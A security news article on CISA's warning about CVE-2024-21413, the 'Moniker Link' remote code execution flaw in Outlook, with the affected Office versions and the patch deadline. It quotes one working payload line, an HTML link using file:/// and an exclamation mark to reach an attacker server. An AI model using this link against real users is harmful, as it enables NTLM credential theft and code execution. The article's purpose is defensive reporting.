Critical Warning: RCE flaw with a 9.8 score in Microsoft Outlook

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has warned of a remote code execution (RCE) vulnerability in Microsoft Outlook, identified as CVE-2024-21413, that stems from improper input validation when opening emails containing malicious links in older versions of Outlook.


CVE-2024-21413 is rated with a CVSS 3.1 score of 9.8. An attacker can execute code remotely because this vulnerability allows them to bypass Protected View, which blocks malicious content embedded in Office files by opening them in read-only mode. Instead, the malicious Office file is opened in edit mode.


When patching CVE-2024-21413 a year ago, Microsoft also warned that the Preview Pane could be an attack vector, allowing attackers to exploit the vulnerability even when only previewing malicious Office documents.


As explained by Check Point, the vulnerability (dubbed Moniker Link) allows an attacker to bypass Outlook's built-in protections against malicious links embedded in emails by using the file:// protocol and adding an exclamation point to a URL pointing to an attacker-controlled server.


An exclamation mark is added immediately after the file extension, followed by a random piece of text (in Check Point's example, they used the word "something"), as illustrated below:


<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>


The vulnerability affects multiple Office products, including:

Microsoft Office LTSC 2021

Microsoft 365 Apps for Enterprise

Microsoft Outlook 2016

Microsoft Office 2019

If successfully exploited, the vulnerability could lead to NTLM credential theft and arbitrary code execution via malicious Office documents. CISA has added CVE-2024-21413 to the Known Exploited Vulnerabilities (KEV) list and required federal agencies to patch the vulnerability by February 27 under Binding Operational Directive (BOD) 22-1, while also recommending that private organizations update their software as soon as possible to avoid risks.


According to Bleeping Computer
